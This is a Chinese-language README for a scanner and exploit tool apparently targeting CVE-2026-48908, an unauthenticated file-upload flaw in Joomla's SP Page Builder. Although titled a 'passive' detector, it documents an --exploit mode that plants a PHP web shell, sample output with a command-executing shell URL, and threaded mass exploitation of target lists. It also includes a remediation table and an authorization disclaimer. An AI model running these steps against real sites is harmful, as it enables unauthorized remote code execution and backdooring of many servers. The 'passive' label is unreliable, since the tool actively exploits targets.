影响 SP Page Builder 的 CVE-2026-48908 被动安全检测器
本项目是一个 安全研究工具,由 yora 开发,用于检测并验证 Joomla 的 SP Page Builder 扩展中的 CVE-2026-48908 漏洞。
该漏洞允许攻击者 在无需认证 的情况下,通过 asset.uploadCustomIcon 端点上传 PHP 文件,随后该文件会被解压到公共目录并可被执行 → 远程代码执行(RCE)。
受影响版本:SP Page Builder 1.0.0 至 6.6.1(在 6.6.2 中修复)。
⚠️ 警告 – 仅可用于 您拥有 或 您已获得书面授权 的系统。未经授权的使用属于 违法行为。
本项目由以下人员开发与维护:
由安全社区与独立研究人员支持。
git clone https://github.com/yora1928/CVE-2026-48908-by-yora.git
cd CVE-2026-48908-by-yora
python -m pip install -r requirements.txt
requirements.txt:
requests>=2.28.0
python scanner.py --url https://target-website.com
示例输出:
[🔴 CONFIRMED] https://target-website.com
├─ SP detected
├─ v6.3.1
└─ Vulnerable version 6.3.1 and endpoint open
python scanner.py --url https://target-website.com --exploit
过程说明:
成功输出示例(来自真实测试):
[*] Scanning: https://target-website.com
[*] Target confirmed vulnerable. Running adaptive exploit...
[*] Trying method: php -> EXECUTED
[🔴 CONFIRMED] https://target-website.com
├─ SP detected
├─ v6.3.1
└─ Vulnerable version 6.3.1 and endpoint open
└─ ✅ RCE confirmed via PoC upload!
Shell URL: https://target-website.com/media/com_sppagebuilder/assets/iconfont/icoyjdehd/fonts/fpqofpk.php?t=7f5e90gcxx0j0r51&c=<cmd>
Created dirs: media/com_sppagebuilder/assets/iconfont/icoyjdehd
如何使用 Shell URL:
c 传入要执行的命令来访问 URL。...?t=7f5e90gcxx0j0r51&c=whoami🔐 Token(
t=...)是机密信息 – 请勿将 shell URL 分享给未经授权的人员。
创建 targets.txt 文件(每行一个 URL):
https://site1.com
https://site2.com
运行:
python scanner.py --list targets.txt --threads 5
带利用:
python scanner.py --list targets.txt --threads 5 --exploit
python scanner.py --url https://target.com --output reports/hasil.json
完成后,清理所创建的目录:
python scanner.py --url https://target.com --exploit --cleanup
注意:
--cleanup会显示需要手动执行的rm -rf命令(因为写入权限可能受限)。如果您有 FTP/SSH 访问权限,请删除Created dirs中列出的目录。
scan_result.json 文件包含所有收集到的证据:
{
"scanner": "CVE-2026-48908 Scanner + Exploit",
"scan_time": "2026-08-13T10:30:00.123456+00:00",
"total_targets": 1,
"results": [
{
"target": "https://target.com",
"classification": {
"status": "CONFIRMED",
"confidence": "high",
"reasoning": ["Vulnerable version 6.3.1 and endpoint open"],
"evidence_summary": ["SP asset at /components/..."]
},
"exploit_result": {
"upload_success": true,
"access_success": true,
"shell_url": "https://target.com/media/.../fpqofpk.php?t=TOKEN&c=<cmd>",
"created_dirs": ["media/com_sppagebuilder/assets/iconfont/icoyjdehd"]
}
}
]
}
CVE-2026-48908-by-yora/
├── scanner.py # File utama (deteksi + exploit)
├── requirements.txt # Dependensi Python
├── README.md # Dokumentasi ini
├── SECURITY.md # Kebijakan keamanan dan pelaporan
├── LICENSE # Lisensi MIT
├── detection/ # (opsional) modul deteksi tambahan
├── poc/ # (opsional) PoC alternatif
└── reports/ # Tempat menyimpan hasil JSON (otomatis)
使用此工具即表示您同意对自身行为承担全部责任。
如果您发现问题或有兴趣贡献,请在本仓库中提交 Issue 或 Pull Request。
安全报告请遵循 SECURITY.md 中的指南。
本项目基于 MIT License 许可 – 详情请参见 LICENSE 文件。
由 yora 用 ❤️ 开发
| 功能 | 说明 |
|---|
| 🔍 组件检测 | 从多种来源(robots.txt、administrator、asset、HTML)检测 Joomla 和 SP Page Builder。 |
| 📌 版本指纹识别 | 通过 CSS/JS、meta 标签和 manifest 文件识别 SP Page Builder 版本。 |
| 🧪 端点验证 | 在无需认证的情况下测试 asset.uploadCustomIcon 的可访问性。 |
| 📊 智能分类 | 将结果分类为 CONFIRMED / LIKELY / NOT_VULNERABLE / UNKNOWN,并附有原因和置信度。 |
| 🚀 自适应利用 | 如果使用 --exploit,工具会尝试多种 PHP 扩展名(.php、.php3、.phtml、.PHP 等)和 .htaccess 来安全地证明 RCE。 |
| 📁 JSON 输出 | 所有证据均保存到 .json 文件中,便于审计和报告。 |
| ⚡ 多线程 | 通过 --list 和线程设置同时扫描多个目标。 |
| 🧹 清理 | --cleanup 显示用于删除已上传工件的命令。 |
| 状态 | 含义 | 建议操作 |
|---|
| 🔴 CONFIRMED | 检测到 SP Page Builder,版本存在漏洞(≤ 6.6.1),且 asset.uploadCustomIcon 端点无需认证即可访问。存在漏洞。 | 立即将 SP Page Builder 更新到 6.6.2 或更高版本。如果已使用 --exploit,请删除已上传的工件。 |
| 🟡 LIKELY | 检测到 SP,版本存在漏洞,但端点认证状态尚无法确定。很可能存在漏洞。 | 手动验证:在不登录的情况下访问 index.php?option=com_sppagebuilder&task=asset.uploadCustomIcon 端点。如果未跳转到登录页,则存在漏洞。 |
| 🟢 NOT_VULNERABLE | 检测到 SP Page Builder 版本 ≥ 6.6.2(已修复)。安全。 | 无需进一步操作。 |
| ⚪ UNKNOWN | 未检测到 SP Page Builder,或无法识别版本,或数据不足。 | 手动检查是否安装了 SP Page Builder。如果是,请尝试通过 /administrator/components/com_sppagebuilder/ 中的 sppagebuilder.xml 文件检测版本。 |
| ❌ ERROR | 发生连接错误或超时。 | 检查互联网连接、防火墙,或尝试使用 --timeout 60 延长超时时间。 |